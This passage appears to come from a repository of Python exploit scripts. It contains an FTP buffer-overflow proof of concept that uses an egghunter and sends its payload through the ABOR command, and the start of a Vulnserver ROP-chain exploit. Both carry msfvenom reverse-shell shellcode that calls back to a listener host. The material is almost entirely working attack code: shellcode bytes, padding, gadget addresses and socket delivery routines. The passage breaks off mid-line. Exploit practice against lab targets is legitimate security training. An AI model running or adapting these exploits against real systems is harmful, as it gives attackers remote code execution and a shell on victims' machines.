"\xef\xb8\x6e\x30\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") 25 | 26 | shellcode = ("n00bn00b" + 27 | "\xbe\xb9\xae\x0f\x45\xdb\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xb1" 28 | "\x5e\x83\xe8\xfc\x31\x70\x11\x03\x70\x11\xe2\x4c\x52\xe7\xca" 29 | "\xae\xab\xf8\xb4\x9f\x79\x9c\xbf\x8d\x4d\xd4\x25\xba\xfc\xea" 30 | "\x2e\xee\x14\xfc\x87\x44\x33\x33\x17\xd3\x49\x1b\xd6\x23\x01" 31 | "\x67\x79\xdf\x58\xb4\x59\xde\x92\xc9\x98\x27\x65\xa7\x75\xf5" 32 | "\xfd\x15\x9a\x72\x43\xa6\xcd\x85\x94\x5d\xb1\xfd\x91\xa2\x46" 33 | "\xb1\x98\xf2\x2c\x11\xbb\x79\x7a\xb9\xba\xae\x2b\x3c\x75\x24" 34 | "\xf0\x0f\x79\x8c\x83\x5b\x0e\x0e\x42\x92\xd0\xbd\xab\x1b\xdd" 35 | "\xbc\xec\x9b\x3e\xcb\x06\xd8\xc3\xcc\xdc\xa3\x1f\x58\xc3\x03" 36 | "\xeb\xfa\x27\xb2\x38\x9c\xac\xb8\xf5\xea\xeb\xdc\x08\x3e\x80" 37 | "\xd8\x81\xc1\x47\x69\xd1\xe5\x43\x32\x81\x84\xd2\x9e\x64\xb8" 38 | "\x05\x46\xd8\x1c\x4d\x64\x0f\x20\xae\x77\x30\x7c\x39\xb4\xfd" 39 | "\x7f\xb9\xd2\x76\xf3\x8b\x7d\x2d\x9b\xa7\xf6\xeb\x5c\xb1\x10" 40 | "\x0c\xb2\x79\x70\xf2\x33\x7a\x59\x31\x67\x2a\xf1\x90\x08\xa1" 41 | "\x01\x1c\xdd\x5c\x0b\x8a\x1e\x08\x33\xc9\xf7\x4b\x43\xcd\x32" 42 | "\xc5\xa5\x9d\x6c\x85\x79\x5e\xdd\x65\x29\x36\x37\x6a\x16\x26" 43 | "\x38\xa0\x3f\xcd\xd7\x1d\x68\x7a\x41\x04\xe2\x1b\x8e\x92\x8f" 44 | "\x1c\x04\x17\x70\xd2\xed\x52\x62\x03\x8a\x9c\x7a\xd4\x3f\x9d" 45 | "\x10\xd0\xe9\xca\x8c\xda\xcc\x3d\x13\x24\x3b\x3e\x53\xda\xba" 46 | "\x77\x28\xed\x28\x38\x46\x12\xbd\xb8\x96\x44\xd7\xb8\xfe\x30" 47 | "\x83\xea\x1b\x3f\x1e\x9f\xb0\xaa\xa1\xf6\x65\x7c\xca\xf4\x50" 48 | "\x4a\x55\x06\xb7\xc8\x92\xf8\x4a\xe7\x3a\x91\xb4\xb7\xba\x61" 49 | "\xde\x37\xeb\x09\x15\x17\x04\xfa\xd6\xb2\x4d\x92\x5d\x53\x3f" 50 | "\x03\x62\x7e\xe1\x9d\x63\x8d\x3a\x2d\x1e\xfe\xbd\xce\xdf\x16" 51 | "\xda\xce\xe0\x16\xdc\xf3\x37\x2f\xaa\x32\x84\x14\xb5\xa8\x20" 52 | "\x61\x5e\x75\xa1\xc8\x03\x86\x1c\x0e\x3a\x05\x94\xef\xb9\x15" 53 | "\xdd\xea\x86\x91\x0e\x87\x97\x77\x30\x34\x97\x5d") 54 | 55 | def exploit_faze(): 56 | exploit = shellcode + '\x90' * (1063 - (len(shellcode) + len(egghunter))) + egghunter + '\xBA\x92\x81\x7C' + '\x90' * 205 57 | 58 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Creates a socket for TCP connection 59 | s.connect((ip,port)) 60 | print(s.recv(1024)) 61 | time.sleep(5) 62 | s.recv(2000) 63 | s.send(b'USER anonymous\r\n') 64 | print(s.recv(2000)) 65 | s.send(b'PASS anonymous\r\n') 66 | print(s.recv(2000)) 67 | s.send(bytes('ABOR ' + exploit + '\r\n','latin-1')) 68 | print("Exploit length is [%d] bytes\n" % len(exploit)) 69 | s.close() 70 | print("--------------------------------------------------------------------\n") 71 | print("Exploit send Successfully!\n") 72 | print("Check your metasploit multi/handler listener\n") 73 | print("--------------------------------------------------------------------\n") 74 | 75 | def main(): 76 | print("--------------------------------------------------------------------\n") 77 | print("\t\t Proof Of Concept by N3R0 (2020)\n") 78 | print("--------------------------------------------------------------------\n") 79 | exploit_faze() 80 | 81 | main() 82 | -------------------------------------------------------------------------------- /ROP-Chain/Vulnserver/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socket 4 | import struct 5 | import sys 6 | import os 7 | 8 | ip = "192.168.56.133" 9 | port = 9999 10 | global s 11 | # EIP overwritten after sending 2006 bytes 12 | # Bad chars = \x00\x0a\x0d\xff 13 | # Mona command to create ROP chain = !mona rop -m *.dll -cp nonull 14 | # Below we have ROP exploit formula: 15 | # exploit = junk + ropchain + nop + shellcode 16 | # Msfvenom payload: 17 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.131 LPORT=443 EXITFUNC=thread -f c -b '\x00\x0a\x0d\xff' 18 | 19 | shellcode = ( 20 | "\xdb\xdb\xbd\x4b\x94\x35\xa0\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" 21 | "\x52\x31\x6a\x17\x83\xc2\x04\x03\x21\x87\xd7\x55\x49\x4f\x95" 22 | "\x96\xb1\x90\xfa\x1f\x54\xa1\x3a\x7b\x1d\x92\x8a\x0f\x73\x1f" 23 | "\x60\x5d\x67\x94\x04\x4a\x88\x1d\xa2\xac\xa7\x9e\x9f\x8d\xa6" 24 | "\x1c\xe2\xc1\x08\x1c\x2d\x14\x49\x59\x50\xd5\x1b\x32\x1e\x48" 25 | "\x8b\x37\x6a\x51\x20\x0b\x7a\xd1\xd5\xdc\x7d\xf0\x48\x56\x24" 26 | "\xd2\x6b\xbb\x5c\x5b\x73\xd8\x59\x15\x08\x2a\x15\xa4\xd8\x62" 27 | "\xd6\x0b\x25\x4b\x25\x55\x62\x6c\xd6\x20\x9a\x8e\x6b\x33\x59" 28 | "\xec\xb7\xb6\x79\x56\x33\x60\xa5\x66\x90\xf7\x2e\x64\x5d\x73" 29 | "\x68\x69\x60\x50\x03\x95\xe9\x57\xc3\x1f\xa9\x73\xc7\x44\x69" 30 | "\x1d\x5e\x21\xdc\x22\x80\x8a\x81\x86\xcb\x27\xd5\xba\x96\x2f" 31 | "\x1a\xf7\x28\xb0\x34\x80\x5b\x82\x9b\x3a\xf3\xae\x54\xe5\x04" 32 | "\xd0\x4e\x51\x9a\x2f\x71\xa2\xb3\xeb\x25\xf2\xab\xda\x45\x99" 33 | "\x2b\xe2\x93\x0e\x7b\x4c\x4c\xef\x2b\x2c\x3c\x87\x21\xa3\x63" 34 | "\xb7\x4a\x69\x0c\x52\xb1\xfa\xf3\x0b\x81\x79\x9b\x49\xf1\x7c" 35 | "\xe7\xc7\x17\x14\x07\x8e\x80\x81\xbe\x8b\x5a\x33\x3e\x06\x27" 36 | "\x73\xb4\xa5\xd8\x3a\x3d\xc3\xca\xab\xcd\x9e\xb0\x7a\xd1\x34" 37 | "\xdc\xe1\x40\xd3\x1c\x6f\x79\x4c\x4b\x38\x4f\x85\x19\xd4\xf6" 38 | "\x3f\x3f\x25\x6e\x07\xfb\xf2\x53\x86\x02\x76\xef\xac\x14\x4e" 39 | "\xf0\xe8\x40\x1e\xa7\xa6\x3e\xd8\x11\x09\xe8\xb2\xce\xc3\x7c" 40 | "\x42\x3d\xd4\xfa\x4b\x68\xa2\xe2\xfa\xc5\xf3\x1d\x32\x82\xf3" 41 | "\x66\x2e\x32\xfb\xbd\xea\x52\x1e\x17\x07\xfb\x87\xf2\xaa\x66" 42 | "\x38\x29\xe8\x9e\xbb\xdb\x91\x64\xa3\xae\x94\x21\x63\x43\xe5" 43 | "\x3a\x06\x63\x5a\x3a\x03") 44 | 45 | def create_rop_chain(): 46 | 47 | # rop chain generated with mona.py - www.corelan.be 48 | rop_gadgets = [ 49 | #[---INFO:gadgets_to_set_esi:---] 50 | 0x75cd1834, # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 51 | 0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll] 52 | 0x7590c442, # MOV EAX,DWORD PTR DS:[EAX] # RETN [KERNELBASE.dll] ** REBASED ** ASLR 53 | 0x77898070, # XCHG EAX,ESI # RETN [ntdll.dll] ** REBASED ** ASLR 54 | #[---INFO:gadgets_to_set_ebp:---] 55 | 0x75cf9afb, # POP EBP # RETN [msvcrt.dll] ** REBASED ** ASLR 56 | 0x625011c7, # & jmp esp [essfunc.dll] 57 | #[---INFO:gadgets_to_set_ebx:---] 58 | 0x77577b82, # POP EAX # RETN [kernel32.dll] ** REBASED ** ASLR 59 | 0xfffffdff, # Value to negate, will become 0x00000201 60 | 0x7630e369, # NEG EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 61 | 0x75d0d3a5, # XCHG EAX,EBX # RETN [msvcrt.dll] ** REBASED ** ASLR 62 | #[---INFO:gadgets_to_set_edx:---] 63 | 0x75d33930, # POP EAX # RETN [msvcrt.dll] ** REBASED ** ASLR 64 | 0xffffffc0, # Value to negate, will become 0x00000040 65 | 0x764190eb, # NEG EAX # RETN [user32.dll] ** REBASED ** ASLR 66 | 0x761783d1, # XCHG EAX,EDX # RETN [USP10.dll] ** REBASED ** ASLR 67 | #[---INFO:gadgets_to_set_ecx:---] 68 | 0x75d2a1ef, # POP ECX # RETN [msvcrt.dll] ** REBASED ** ASLR 69 | 0x62504265, # &Writable location [essfunc.dll] 70 | #[---INFO:gadgets_to_set_edi:---] 71 | 0x7789526a, # POP EDI # RETN [ntdll.dll] ** REBASED ** ASLR 72 | 0x76413165, # RETN (ROP NOP) [user32.dll] ** REBASED ** ASLR 73 | #[---INFO:gadgets_to_set_eax:---] 74 | 0x76303934, # POP EAX # RETN [RPCRT4.dll] ** REBASED ** ASLR 75 | 0x90909090, # nop 76 | #[---INFO:pushad:---] 77 | 0x762f0201, # PUSHAD # RETN [RPCRT4.dll] ** REBASED ** ASLR 78 | ] 79 | return b''.join(struct.pack('